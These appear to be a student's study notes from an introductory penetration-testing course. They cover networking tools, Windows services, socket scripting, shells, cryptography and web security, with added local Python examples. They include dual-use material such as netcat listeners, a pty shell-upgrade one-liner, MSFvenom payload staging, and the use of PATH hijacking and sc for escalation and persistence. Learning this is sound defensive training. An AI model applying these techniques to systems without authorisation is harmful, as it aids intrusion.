scope variables are available within the specific function.
Syntax: $ScopeType:variable_name = value
17. A function is declared with the function keyword, a name, and a script block:
function <name> {
<actions>
}

18. The default execution policy is Restricted for Windows clients, and it is
RemoteSigned for Windows servers. The Restricted policy means the
system will neither load PowerShell configuration files nor run PowerShell
scripts. The RemoteSigned policy allows the execution of PowerShell
scripts only if the script was written on the local system and not
downloaded from the Internet, or if the script carries a digital signature
from a trusted publisher.
19. The last concept we will discuss is PowerShell modules, which are
packages that contain additional cmdlets, functions, providers, and
more.

Linux Networking and Services [Part I]


1. A Linux system may have the legacy net-tools installed, or instead use
iproute, the newer package of network utilities.
2. The simplest way to identify the IP address, netmask, MAC address, and
other network metrics is by using ifconfig.
3. A MAC address is a physical address that, unlike an IP address, cannot
be changed. Its value is 6 bytes in length, and each byte is represented
in hexadecimal.
4. The iface is short for interface and inet is the type of connection that
will be made. The type of connection can be "static" or "dhcp"
(dynamic).
The address line contains the desired IP for the host. The netmask
specifies the network mask of the network the IP is on. The gateway is
the IP the network needs to use to reach out to other networks. This
would normally be the network's router IP.
5. Let's begin enumerating hosts that are communicating with our host.
We'll need to investigate three network utilities to do this: netstat, ss,
and arp.
6. ESTABLISHED indicates that this is an active connection. CLOSE_WAIT
means that the remote end has shut down and the host is waiting for the
socket to close. TIME_WAIT is when the socket is waiting after closing
to handle packets still in the network. LISTENING is when the host is
listening for incoming connections. SYN_SENT means the socket is
actively attempting to establish a connection.
7. Host: End Devices/Computers
Gateway: Router that connects to end network
Subnet: Smaller(sub) networks within the main network
Subnet Mask: 4-byte number to mask subnet devices
8. Another helpful ICMP utility when troubleshooting network connections is
traceroute. With this utility, the TTL (time to live) is lengthened as
compared to ping, and each hop (router) is reported back to the
originating host. This is ideal when determining how many router hops
are between a host and the target.
9. The number of hops a packet travels before being discarded by a network
is known as the time to live (TTL) or hop limit.
10. Internet Control Message Protocol (ICMP) is a network layer protocol
used to diagnose communication errors by performing an error control
mechanism.
11. Address Resolution Protocol (ARP) is responsible for finding the hardware
address (MAC address) of a host from a known IP address.
12. A Domain Name System (DNS) server takes in requests for the
human-readable site name, searches a table for that name, then points the
requests to the appropriate IP. This is similar to how we might search
for a name in a physical phone book to find a phone number.
13. A domain name like www.offsec.com has 3 components:
a. Top Level Domain: .com
b. Domain: offsec
c. Subdomain: www
14. Secure Shell Protocol (SSH) is a client/server protocol for enabling
secure communications between two hosts. Communication over SSH is
encrypted over the network, whereas telnet (another similar client
utility) is not.
15. SSH can also be used to remotely copy files via a utility called SCP
(Secure Copy Protocol). The syntax for scp is very similar to the cp
command, except the location of the file will contain
User@host:remote-file-path.
16. sshpass utility is designed to supply the ssh password in the command
execution, rather than having to manually enter it at the prompt. This is
useful because it means an ssh session can be opened through a script
without requiring user interaction.
17. Netcat is, most simply, a utility which reads and writes data across
network connections, using TCP or UDP protocols. Netcat can run in
either client or server mode.
18. To establish a basic chat service between two Linux machines, create a
netcat listener on one machine on a specific port and then connect to
that port using the other machine.
Listener: nc -lnvp <port>
Client: nc -nv <ip> <port>
19. Socat is a command-line utility that establishes two bidirectional byte
streams and transfers data between them. For penetration testing, it is
similar to Netcat but has additional useful features.
Connect: socat - TCP4:<remote server's ip address>:<port>
Listen: sudo socat TCP4-LISTEN:<port> STDOUT
20. Wget is a very helpful utility for downloading files from a web server. -O
is to output file to a specific name/location. -o is to output the log file
to specified location. --recursive can be used when we want to rebuild a
website or copy an entire website to our host.
21. Another client we can use to copy files from servers is cURL, which
stands for "Client URL." curl is extremely powerful because it offers an
incredible amount of options that can be used to manipulate the request
to the server.
22. We can use nslookup and dig to identify the IP addresses of hosts by
their human-readable names. The default search record for both nslookup
and dig is the A record. This can be changed by specifying the type in
the command line like -t mx or ns or ptr or cname or txt
23. The easiest way to access an FTP server is through anonymous access.
This is when the user is anonymous and a password is not needed.
Anything can be entered in as the password, and the login will be
accepted.
24. To upload a file to a ftp server we use the put command whereas to
download a file from the server we use the get command.
25. Two types of FTP:
Active Mode: Server is reached on port 21 but responds using port 20.
Passive Mode: Server is reached on port 21 but responds using random
port.
26. Binary vs. ASCII modes are related to how the file is transferred. If the
file is a text file, ASCII mode can be used. It modifies the files to ensure
compatibility when reading a text file, when transferred from one type of
system to another. Binary mode will keep the file in its original state,
without modifying the newline entries.

Linux Networking and Services [Part II]


1. Access Control List (ACL) is a list of rules to control access to
computer resources. This can be either in the filesystem or network. A
network ACL will typically have three actions it can take. These are
ACCEPT, DROP, and REJECT.
2. The Linux kernel has a packet filtering framework, called netfilter. The
utility that hooks into this framework is iptables, which is used to
create and/or modify ACLs for the Linux firewall.
3. A stateful protocol keeps track of the connection information and, as
a result, delivers superior performance because it continually keeps
track of that information. A stateless protocol is one in which the
receiver is not required to keep session state from previous requests.
4. Iptables rules are not persistent after a reboot. So, all the rules that were
modified, added or removed must be saved with iptables-save.
5. Sometimes, it's easier to have a frontend interface to handle the
firewall rules. There are two tools that we can use to accomplish this:
Uncomplicated Firewall (UFW) and FWBuilder.
6. The SysV Init service type is the legacy version of how Linux services
work. Despite being legacy, it is still widely in use and Systemd is
backward-compatible with it.
7. Runlevels are designations set to how a Linux system starts and what
services are running. They are divided into 7 categories. The
configuration to set a Linux system's default runlevel is in /etc/inittab.
8. service is considered to be a legacy command, so it may become less
common to find SysV Init systems in the wild. Eg: service ssh start
Systemd uses a utility called systemctl to control it. This is very similar
to the service utility, but the syntax is reversed for the service-name
and action. Eg: systemctl start ssh
9. Target units in systemd are very similar in concept to runlevels, in
that they define what services run at each target-unit level. Unlike
runlevels, there is more flexibility to define more than 7
classifications.
10. There are also three categorizations for each target-unit: LOAD, ACTIVE,
and SUB. LOAD specifies if a target-unit is loaded in the Linux host.
ACTIVE specifies if a particular target-unit is currently active or not. SUB
specifies the status of the services running under a target-unit.
11. We can verify that the SSH service is running and listening on TCP port 22
by using the netstat command and piping the output into grep to search
the output for sshd. netstat -antp|grep sshd
12. There is another common way to create a temporary web server that
uses Python. It is useful to have a temporary solution to run on demand
and not worry about exposing ports on our Kali host that we don't need.
sudo python3 -m http.server 80

Windows Networking and Services


1. Important networking utilities like ping, tracert, arp, netstat, nbtstat,
nslookup, ipconfig, route, and more provide us with the ability to either
gather information or interact with the network settings of a Windows
device.
2. The set command can be used to inspect and change Windows environment
variables. Environment variables are values that impact how certain
programs work. For Windows systems, to identify them as environment
variables, they are denoted with a percent sign (%) before and after.
Eg: %temp%
3. Whenever we run a command in the CLI, we don't always need to be in
the same working directory as the command itself; instead, the
command interpreter will search for the binary. The locations it
searches are the values within the %PATH% variable.
4. (File Execution Vulnerability) A real-world example of how "set" can be
used by offensive operators is an attack known as "Hijack Execution
Flow". Essentially, an attacker might manipulate the %PATH%
environment variable so that their malicious program is executed instead
of the normal executable.
5. When we use set to add, delete, or change environment variables, those
changes only exist as long as the process we are currently in exists. To
make non-volatile or permanent changes to environment variables, we
must use setx.
6. The netstat command not only shows the IP address of the source, but
also displays things like the destination IP, source and destination port,
connection state, and layers 3 and 4 protocol statistics.
7. The arp command lets us view and manipulate Address Resolution
Protocol (ARP) cache entries. Running arp -a displays ARP entries for all
network interfaces.
8. In a nutshell, name resolution is a process where numerical values, like
IP addresses, are connected to host or domain names. Under the hood,
network traffic requires IP addresses to travel from source to
destination.
9. The nbtstat command shows information like the NetBIOS name table and
cache. It also can display the NetBT protocol information for local and
remote machines. Lastly, the /n parameter will display the name table
of the local computer.
10. The hosts file is located in the %SystemRoot%\System32\drivers\etc
folder in Windows. This is a plain text file that contains hosts-to-IP
mappings and is one of the primary locations the OS checks when it
attempts to resolve host/domain names.
11. The nslookup command will either find the IP of a domain name or the
domain name of an IP address (reverse lookup).
12. In computing, client and server are terms referring to a relationship
process. Generally, servers provide a service, like data, to clients. A
simple example is how browsers are used as a way to have a client
connect to a web server.
13. The Server Message Block(SMB) protocol allows clients to access shared
resources. Historically SMB has a reputation of being very vulnerable.
Because of this, targeting SMB (or similar services) is generally at the
top of the list for attackers.
14. The net share command helps us configure and manage shared resources
hosted on our local machine, and we can leverage net use to connect to
remote shared resources, interact with them, and manage those
connections.
15. Windows Sysinternals is a collection of freeware tools that can assist in
things like diagnosing, troubleshooting, and managing Windows systems.
Psexec is one of the CLI tools within the Sysinternals suite that has
many features, but one of the more prominent features is the ability to
launch command prompts on remote devices.
16. The network shell (netsh) command is a CLI tool that allows us to view
and manipulate networking configurations of our local Windows device.
The netsh command has two options when it comes to interacting with
the firewall: firewall and advfirewall.
17. The sc command, officially known as the Service Control Manager (SCM),
is a program that enables, disables, and interacts with Windows
services. As an offensive operator, the sc utility is powerful because we
can use it for things like system enumeration, privilege escalation, and
persistence.
18. In terms of normal operations, whenever a user runs an executable, the
program will spawn one more process. Processes may start or stop a
service, but it doesn’t always have to happen. Comparatively, all
services are processes and as mentioned previously, do not require user
interaction.
19. PsService (part of the Windows Sysinternals suite) is very similar to the sc
utility, but one thing PsService can do that sc cannot do is access a
remote system with a different user account. This can be helpful when a
certain user has the necessary permissions and we can exploit that.
20. The net command can be used to interact with numerous Windows
environment objects like users, shares, services, and account policies.
21. Remote Desktop is a feature that is native to most Windows systems. It
allows clients to use the Remote Desktop Protocol (RDP) client to
connect to servers that run on TCP port 3389 by default. The great
benefit about RDP is that we can connect to a remote computer with GUI
capabilities.

Network Scripting
1. A socket is essentially an endpoint that allows network communication to
flow between two programs running over a network. We can implement
network sockets on several different channel types.
2. The socket_family variable allows us to specify a protocol domain.
AF_INET is used for IPv4 Internet addressing and AF_INET6 is used for
IPv6 Internet addressing. AF_UNIX is the address family for Unix Domain
Sockets (UDS). The socket type is usually either SOCK_DGRAM for the
User Datagram Protocol (UDP) or SOCK_STREAM for the Transmission
Control Protocol (TCP).
3. The socket.connect(address) method is used to initiate a connection
with the server. The method requires that we specify a single host and
port to connect on, which we defined in the host and port variables. The
socket.recv(bufsize) method allows the client to receive a TCP message
from the socket.
4. The bufsize (buffer size) argument defines the maximum amount of data
that the method can receive at any one time.
5. The telnetlib allows for an implementation of the Telnet protocol. We will
be modifying our script to make use of the telnetlib.interact() method,
which will allow us to interact with the server dynamically.
6. The socket.bind(address) method binds, or assigns, a specific port to
our program. In this case, we want to bind our server to the port we
defined in the port variable. The socket.listen(int) method tells the
server to listen for incoming connections and expects an integer.
7. The integer specified in socket.listen() represents the number of clients
the server will allow to connect to itself simultaneously. Once the server
is listening, it reports its status via the print function.
9. Port scanning allows us to locate open ports that are available on a
particular host. As penetration testers, we can configure our port
scanner to retrieve information about the ports, assess what services
are running on each port, and even guess which OS may be running on
the host.
10. The time.time() method returns the time at which the Python interpreter
runs the line of code it is located on.
11. socket.connect_ex() does the same thing as socket.connect(), but it
returns an error indicator upon success or failure. On connecting
successfully it returns 0.
12. Port Knocking is a means by which external users can open a gated port
on a machine by first connecting to a predetermined list of other ports in
a specific order. Think of it like entering a PIN on a mobile device: if you
input the correct numbers in the correct order, the phone will unlock.
13. It is important to note that the send() method requires a byte-like object
argument, not a string. We can use the encode() method on a variable
to convert its content to bytes, and use the decode() method to convert
bytes to a string.
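Items 2 through 13 above describe the socket calls one by one; the following added example (my code, not from the course notes) wires them together on the local host: a one-shot echo server using bind/listen/accept/recv, a client that encodes a str before sending and decodes the reply, and a connect_ex() probe timed with time.time(). The loopback HOST, the port-0 trick for picking a free port, and the 1024-byte bufsize are assumptions made so it runs anywhere.

```python
import socket
import threading
import time

HOST = "127.0.0.1"   # assumption: everything runs on the local host only


def start_echo_server(backlog=5):
    """Bind, listen, accept one client and echo its first message back.

    Returns (port, thread). Port 0 asks the OS for any free port; backlog
    is the integer handed to socket.listen(), i.e. how many pending
    clients may queue before the server accepts them.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # IPv4, TCP
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, 0))
    srv.listen(backlog)
    port = srv.getsockname()[1]

    def serve():
        try:
            conn, _peer = srv.accept()          # blocks until a client connects
            with conn:
                data = conn.recv(1024)          # bufsize: at most 1024 bytes per call
                if data:                        # b'' means the peer closed already
                    conn.sendall(data)          # echo the raw bytes back
        finally:
            srv.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return port, thread


def echo_client(port, message: str) -> str:
    """Connect to the echo server, send a str as bytes, return the decoded reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(3)
        s.connect((HOST, port))
        s.sendall(message.encode())             # send() wants bytes, not str
        return s.recv(1024).decode()            # bytes back to str


def check_port(port, timeout=1.0):
    """Probe one local TCP port with connect_ex(): 0 means the connect succeeded.

    Returns (is_open, seconds_taken) so the cost of open vs. closed ports
    can be compared; a refused connection returns almost immediately.
    """
    start = time.time()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        err = s.connect_ex((HOST, port))
    return err == 0, time.time() - start


def closed_port():
    """Reserve then release a port so it is known to be closed (helper)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, thread = start_echo_server()
    # the probe itself is the one connection this server accepts
    print("server on", port, "open:", check_port(port)[0])
    thread.join(3)
    port, thread = start_echo_server()
    print("echo:", echo_client(port, "hello"))
    thread.join(3)
    print("closed port open:", check_port(closed_port())[0])
```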
14. Web Scraping is a process of sweeping information that is contained on a
webpage and extracting the information we're interested in. As
penetration testers, it is sometimes easier to retrieve the data we are
looking for by writing a script than trying to look for the data manually
from the website.
15. In a POST request, the data that is sent to the server is stored in the
request body of an HTTP request. This is in contrast to a GET request,
where data is sent directly via a URL. A common use-case for POST
requests employed by many websites is web forms, such as those used
when subscribing to a site.
16. A request header contains detailed information about the resource that is
being queried. A response header holds additional information about the
response. For example, a response header might include the location of
the server.
17. Scapy is a flexible Python-based packet manipulation program. The
purpose of using Scapy is mainly two things: to send packets and to
receive answers.
18. A spoofed packet disguises its source IP address, so that the receiver
believes that the packet originates from a different source. Packet
spoofing can be used by attackers to misrepresent where they are, or to
impersonate other users.

Working with Shells


1. A shell is the user interface of a system. This can either be a Command
Line Interface (CLI), which is a user interface that only allows typing,
or a Graphical User Interface (GUI), a user interface that has visual
windows and can interface with a mouse.
2. PsExec is part of the Sysinternals suite and we can use it to establish
remote Windows shells in a variety of ways. The PsTools suite is a
subset of Sysinternals and includes PsExec along with numerous other
utilities. This is not installed on Windows by default.
3. Evil-WinRM is a feature-rich tool used to establish remote shells using
Microsoft's implementation of the WS-Management protocol, WinRM.
4. MSFvenom, which is part of the Metasploit Framework developed by
Rapid7, creates payloads and manages their encoding needs. MSFvenom
is a feature-rich toolset that allows for multiple variables in the type of
format it is created in, the encoding and payload options, and the
configurations for the target and/or host machines.
5. The Framework Executable Formats are used when the custom shell is
made as a standalone program. This can be placed on the system and
executed directly. The Framework Transform Formats are used inside
the custom code that we are writing. These are not compiled or
executable, but formatted to incorporate into our source code.
6. Staged payloads begin the execution process with a small portion of the
code that doesn't contain the full payload. Instead, it initiates the
payload download from the attacking host after it begins execution. The
benefit of a staged payload is that the size of the file is smaller.
7. Stageless payloads contain the full payload from MSFvenom and do not
require any additional resources from the attacker after initial execution.
These payloads are larger when they are produced but often don't
require the use of Metasploit to obtain shell access.
8. ELF stands for Executable and Linkable Format and is the standard
format for executable files on Linux systems.
9. We start a simple HTTP server by running a Python module. We will enter
python -m SimpleHTTPServer 80 on our Kali machine.
10. To do that we need to run Python with the -c option, which will allow us
to run a command. From here we will tell Python to run a command in
single quotes. python -c 'import pty;pty.spawn("/bin/bash")'

Troubleshooting
Nothing to Note...

Cryptography
1. Cryptography, from the Greek word "kryptos" (meaning concealed),
involves the concealment of information from third-parties. It involves
encoding, hashing, and encryption.
2. Entropy: The amount of unpredictability in a given ciphertext. Entropy
colloquially refers to how close the ciphertext is to ideal randomly
generated text.
3. Fundamental Theorem of Arithmetic: The mathematical statement that
every natural number greater than 1 must be either prime or a product of
unique prime factors. Forms the basis of many asymmetric cryptography
implementations.
4. Encoding is a means of converting data. Data may be converted into
another format in order to transmit it, store it, or compress it. Encoding
might also be used to describe a data structure or format, for example a
file format. Algorithms can encode and decode this data without any sort
of key.
5. Binary encoding allows us to use only a sequence of 0s and 1s to
represent far more complex data. Executable program files are
sometimes called "binary files" or "binaries" as well.
6. Most Linux distributions include the bc program, which is a calculator.
This calculator can also convert numbers between different bases.
7. Since hexadecimal appears similar to regular decimal numbers at times,
we often differentiate it by adding the prefix "0x". We can be similarly
precise with binary by using the prefix "0b", as in 0b11 and 0b110.
8. Any time we are talking about memory addresses, whether we are
developing an exploit or perhaps trying to perform a forensic
investigation, we always use hex-encoded addresses.
9. Unicode is a standard that provides a number, or unique code point, for
each character. Another way to say this is that each character is
mapped to a unique value. Unicode Transformation Format (UTF) is a
way to encode these Unicode mappings. The most common forms of UTF
are UTF-8, which uses 8 bits, or 1-byte unit, and UTF-16, which uses
16 bits, or 2-byte units.
10. Base64 works by converting every three bytes of binary data into four
Base64 characters. Each three-byte sequence is called a block. 3x8
bits of input produces 4x6 bits of Base64 output. Base64 encoded
strings are always longer than the original text because regular bytes
have eight bits and Base64 characters only carry six bits of data.
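To make the 3-byte-to-4-character mapping concrete, here is an added example (my code, not from the notes) that implements the Base64 block conversion by hand, including the "=" padding for a final block of one or two bytes, and checks itself against the standard library. The alphabet is the standard one from RFC 4648; the sample inputs are constructed.

```python
import base64

# Standard Base64 alphabet (RFC 4648): index 0..63 -> one character
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64_encode(data: bytes) -> str:
    """Each 3-byte block (24 bits) becomes four 6-bit indexes into ALPHABET.

    A trailing block of 1 or 2 bytes is zero-padded to 24 bits; each missing
    input byte drops one output character, which is replaced by '='.
    """
    out = []
    for i in range(0, len(data), 3):
        block = data[i:i + 3]
        pad = 3 - len(block)                                  # 0, 1 or 2
        bits = int.from_bytes(block + b"\x00" * pad, "big")   # 24-bit integer
        chars = [ALPHABET[(bits >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        out.append("".join(chars[:4 - pad]) + "=" * pad)
    return "".join(out)


def b64_decode(text: str) -> bytes:
    """Reverse mapping: four characters -> 24 bits -> up to three bytes."""
    lookup = {c: i for i, c in enumerate(ALPHABET)}
    if len(text) % 4:
        raise ValueError("Base64 input length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(text), 4):
        quad = text[i:i + 4]
        pad = quad.count("=")
        bits = 0
        for c in quad:
            bits = (bits << 6) | (0 if c == "=" else lookup[c])
        out += bits.to_bytes(3, "big")[:3 - pad]   # drop the padding bytes
    return bytes(out)


def expansion_ratio(data: bytes) -> float:
    """Encoded length / raw length: 4/3 for whole blocks, more with padding."""
    return len(b64_encode(data)) / len(data)


def matches_stdlib(data: bytes) -> bool:
    """Cross-check the hand-rolled encoder against base64.b64encode."""
    return b64_encode(data) == base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    for sample in (b"Man", b"Ma", b"M"):       # constructed inputs
        print(sample, "->", b64_encode(sample))
```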
11. Hashing is a transformation of variable-sized input data to a fixed-size
hexadecimal output. This output is often called a hash, or a digest. Even
the smallest change in the input data can greatly change the resulting
digest. Because of this, hashing is often used to verify the integrity of
some input data.
12. One of the common applications for hashing is calculating checksums.
Checksums are used to prove the integrity of the transmitted data. If the
checksums calculated on the sender's side are the same as the ones
calculated after the data transmission, it means that the transmitted
data are intact.
13. With respect to brute forcing, a password's strength is a function of its
length and its complexity. If we want to make a password stronger,
increasing its length usually has more defensive utility than increasing its
complexity.
14. Password hashes typically indicate which hashing algorithm produced it.
This indicator is usually a numeric value located between the first and
the second dollar sign.
15. LM and NTLM are two different hashing algorithms Windows has used to
store passwords. LM hashing is now obsolete and disabled in newer
versions of Windows. This is because it is significantly weaker than
NTLM, in that it only allows about 140 different characters in its
passwords, compared to NTLM's significantly more numerous 65536.
16. A salt is an ideally random, unique generated string. The salt is mixed
with the cleartext input (for example, appended to it), and then the
hash is calculated for the mixed string.
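Items 11, 12, 14 and 16 above are easiest to see side by side, so here is an added example (my code, not from the notes) that computes digests and measures how many bits change for a one-character input change, verifies a checksum in constant time, shows that salting the same password with different salts yields different digests, and parses the "$id$salt$hash" layout to name the algorithm. The sample strings are constructed, and the id table covers only the three crypt variants I am certain of.

```python
import hashlib
import hmac


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Variable-length input -> fixed-size digest, shown as hex (item 11)."""
    return hashlib.new(algorithm, data).hexdigest()


def bit_difference(hex_a: str, hex_b: str) -> int:
    """Number of differing bits between two equal-length hex digests."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def verify_checksum(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Receiver-side integrity check (item 12), compared in constant time."""
    return hmac.compare_digest(digest_hex(data, algorithm), expected_hex.lower())


def salted_digest(password: str, salt: bytes, algorithm: str = "sha256") -> str:
    """Salt mixed with the cleartext (here: prepended) before hashing (item 16)."""
    return hashlib.new(algorithm, salt + password.encode()).hexdigest()


# id field between the first two '$' -> algorithm (Modular Crypt Format, item 14)
CRYPT_IDS = {"1": "md5-crypt", "5": "sha256-crypt", "6": "sha512-crypt"}


def identify_crypt_hash(hash_string: str):
    """Split '$id$[rounds=N$]salt$hash' and name the algorithm from the id.

    Returns a dict, or None when the string does not follow that layout.
    """
    if not hash_string.startswith("$"):
        return None
    parts = hash_string.split("$")[1:]          # drop the empty lead element
    if len(parts) < 3:
        return None
    ident, fields = parts[0], parts[1:]
    rounds = None
    if fields[0].startswith("rounds="):         # optional sha-crypt cost field
        rounds = int(fields[0][len("rounds="):])
        fields = fields[1:]
    return {
        "algorithm": CRYPT_IDS.get(ident, "unknown"),
        "id": ident,
        "rounds": rounds,
        "salt": fields[0],
        "hash": fields[-1],
    }


if __name__ == "__main__":
    a, b = digest_hex(b"abc"), digest_hex(b"abd")
    print("sha256(abc) =", a)
    print("bits changed for one-character change:", bit_difference(a, b), "of 256")
    print(salted_digest("hunter2", b"salt1") == salted_digest("hunter2", b"salt2"))
    # constructed string in the $6$ layout; the hash part is a placeholder
    print(identify_crypt_hash("$6$saltsalt$" + "h" * 86))
```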
17. Like a physical key, a cryptographic key is (usually) a unique entity that
pairs with a specific thing that will be opened or unlocked. Keys
generally have the property of being hard to replicate assuming you do
not have the original key in your possession.
18. Symmetric-key algorithms use the same key for encrypting the plaintext
(also sometimes called cleartext) into ciphertext and for decrypting the
ciphertext back into plaintext.
19. To reproduce ROT13, we can use the built-in tr command on Kali Linux.
tr can translate letters based on the provided parameters.
echo "text to encrypt" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
20. Frequency analysis is the study of how often a particular character or
pattern of characters arises in a given ciphertext. Since languages tend
to abide by certain patterns (for example, the most common letter in the
English language is "e"), an attacker with sufficient ciphertext may be
able to crack a cipher simply by observing such patterns.
21. Block cipher encryption algorithms are the ones which work on blocks of
data (multiple bytes); for example, Blowfish uses 64-bit data blocks. On the other
hand, stream ciphers operate on plaintext only one byte at a time (i.e.,
each letter of the plaintext is modified independently).
22. GNU Privacy Guard (gpg) is a free and open-source command-line tool
which is a rendition of Pretty Good Privacy (PGP), which is a
cryptographic product usually used for email encryption.
23. Asymmetric cryptography, also known as public-key cryptography, is a
process that uses a pair of related keys -- one public key and one
private key -- to encrypt and decrypt a message and protect it from
unauthorized access or use.
24. There are several methods for implementing the relationship between
keys in a key-pair, but each of them hinge on a fundamental
mathematical concept: the procedure that generates the key-pairs must
be easy to compute given some input, but it must be difficult to reverse
given some output.
25. First, we select two prime numbers (designated by p and q) and then
multiply them together to form the product n. Using n as a base, we can
perform some additional math to output two special numbers e and d,
such that they have particular properties relative to n. We can then
define a public key as the tuple (n,e), and a private key as the tuple
(n,d).
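The key-generation steps in item 25 and the "easy forward, hard to reverse" property of item 24 carried through with toy-sized numbers, as an added example (my code, not from the notes): p and q give n and phi(n), e is chosen coprime to phi(n), d is the modular inverse of e, and the public tuple (n, e) and private tuple (n, d) encrypt and decrypt an integer. The small primes and e = 17 are constructed values; recover_primes() shows why reversing n is only feasible at this size.

```python
from math import gcd, isqrt


def is_prime(x: int) -> bool:
    """Trial division; fine for the toy sizes used here."""
    if x < 2:
        return False
    return all(x % k for k in range(2, isqrt(x) + 1))


def generate_keypair(p: int, q: int, e: int = 17):
    """Return ((n, e), (n, d)) following item 25.

    n = p*q, phi = (p-1)*(q-1), and d satisfies e*d = 1 (mod phi), so that
    (m**e)**d = m (mod n) for any message integer m < n.
    """
    if not (is_prime(p) and is_prime(q)) or p == q:
        raise ValueError("p and q must be two distinct primes")
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)            # modular inverse, Python 3.8+
    return (n, e), (n, d)


def encrypt_int(public_key, m: int) -> int:
    """c = m**e mod n; the message must be smaller than the modulus."""
    n, e = public_key
    if not 0 <= m < n:
        raise ValueError("message must satisfy 0 <= m < n")
    return pow(m, e, n)


def decrypt_int(private_key, c: int) -> int:
    """m = c**d mod n."""
    n, d = private_key
    return pow(c, d, n)


def encrypt_bytes(public_key, data: bytes) -> list:
    """Textbook per-byte RSA, for illustration only: real RSA pads the
    whole message (e.g. OAEP) and uses primes hundreds of digits long."""
    return [encrypt_int(public_key, b) for b in data]


def decrypt_bytes(private_key, blocks: list) -> bytes:
    return bytes(decrypt_int(private_key, c) for c in blocks)


def recover_primes(n: int):
    """The hard direction of item 24: recover p, q from n by trial division.
    Trivial for a toy n like 3233, infeasible for real key sizes."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    return None


if __name__ == "__main__":
    public, private = generate_keypair(61, 53)     # constructed primes
    print("public", public, "private", private)
    c = encrypt_int(public, 65)
    print("65 ->", c, "->", decrypt_int(private, c))
    print("factors of n:", recover_primes(public[0]))
```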
26. Using asymmetric cryptography in SSH: Once we have generated a
public-private key pair using ssh-keygen, we need to send our public key
to the target using ssh-copy-id -i /public.pub target@<target-host>.
Then once our public key is saved on the target we can connect
to the target using our private key as ssh -i /key.private
target@<target-host>.
27. openssl s_client is the implementation of a simple client that connects
to a server using SSL/TLS. To connect to a server using SSL/TLS we can use
the following command: openssl s_client -connect <ip:port>
28. Privacy Enhanced Mail (PEM) file or .pem is simply a list of Base64
encoded strings, usually containing multiple certificates, keys, and other
cryptographic items. Entities in a .pem are separated by lines such as
"-----BEGIN/END PRIVATE KEY-----".
29. Forward secrecy is a feature that aims to protect against session key
compromise. In short, this feature assures that past communication
cannot be decrypted if the private key gets compromised.

Web Applications
1. The Open Web Application Security Project (OWASP) is a non-profit
foundation that works on web security. Among other activities, they
publish papers, develop and contribute to open-source projects, and
organize, host, and promote security conferences.
2. Access Control refers to the restrictions on the abilities and functionality a
user is granted at a particular level of authentication. Once a user is
logged in to a website, additional security controls must be put in place
to prevent them from executing unintended actions.
3. Sometimes, a user may be able to carefully craft their input so that the
application interprets the text as some kind of code. When a user is able
to input and execute code in this manner, it is called an Injection
attack.
4. Cross-Site Scripting (XSS) is a particular form of injection where the
code that gets inputted by an attacker is executed within the browser of
another user. By contrast, most other injection attacks execute code on
the machine running the application rather than the client.
5. Insecure design refers to issues that occur because the design of the
application is fundamentally flawed. For example, if the application
should check for password-length when a user signs up but fails to do
so, that application can be said to have insecure design flaws.
6. Server-Side Request Forgery (SSRF) happens when a web application
tries to reach a remote server without validating the URL of the remote
server. If an attacker can control the contents of the URL, this can
allow them to force the application to make a request to a resource it
shouldn't be able to reach, including an attacker's own server.
7. In the context of web application attacks, a payload is any weaponized
request meant to poke at functionality or cause harm to the app.
However, the term payload also generally refers to the body of an HTTP
request.
8. We could edit the request in the Intercept view of Burp, but then we
would need to resubmit if we want a fresh request. Instead, we can
send this request to the Repeater to be able to modify and repeat the
request as many times as we'd like.
9. An HTTP request method tells the HTTP protocol what kind of action the
client wants to perform on a given resource or page. It's then up to the
server to determine how to interpret or handle the request.
10. URL encoding is the practice of translating unprintable characters or
characters with special meaning within URLs to a representation that is
unambiguous and universally accepted by web browsers and servers. The
urllib.parse package within Python3 provides URL encoding with the
quote() function. Eg: urllib.parse.quote('/El Niño/')
11. There are several headers that start with the letter "X", as in X-
Requested-With. This syntax is one way to represent non-standard HTTP
headers, and they often reveal interesting information about the
software used by the web application.
12. HTTP cookies are a common way to maintain state throughout a series of
HTTP requests for a particular user. It is how a client can authenticate
himself to the server and access his saved session state without sending
his username & password in each HTTP request. Cookies are randomly
generated and are used as lookup keys for server-side data.
13. It's important to note that HTML is not considered a programming
language, but a markup language, which means it describes how to
render text.
14. The Document Object Model (DOM) connects web pages to scripts or
programming languages by representing the structure of a document—
such as the HTML representing a web page—in memory. The DOM
represents a document with a logical tree. DOM methods allow
programmatic access to the tree. With them, you can change the
document's structure, style, or content.
15. JavaScript is a high-level programming language that has become one of
the fundamental components of modern web applications. All modern
browsers include a JavaScript engine that runs any client-side JavaScript
code.
16. Minification compresses JavaScript files by removing unnecessary
content, such as comments and extra white space. This process does
not change the functionality of the minified files. This is done to reduce
the file size to help them load faster.
17. Robots.txt allows us to specify files on our server that we don't want
to be crawlable. Effectively, robots.txt tells a robot whether it should
be allowed to visit certain parts of the site or not. Humans.txt is a
relatively newer convention that lists all the people who have worked on
a web site.
18. Where robots.txt primarily specifies files that should be ignored by
crawlers, sitemap.xml helps to tell search engines that the site should
be crawled. This is often used for Search Engine Optimization (SEO).
19. Unlike a classic web server that maps each URL to a file on disk, many
modern web applications make use of HTTP routing. Instead of having a file
living at /var/www/html/site, the application's code would define a URL at
site/ to respond with a certain resource. Hence, to access a resource we
need to know its full route, and the developer can also restrict access to
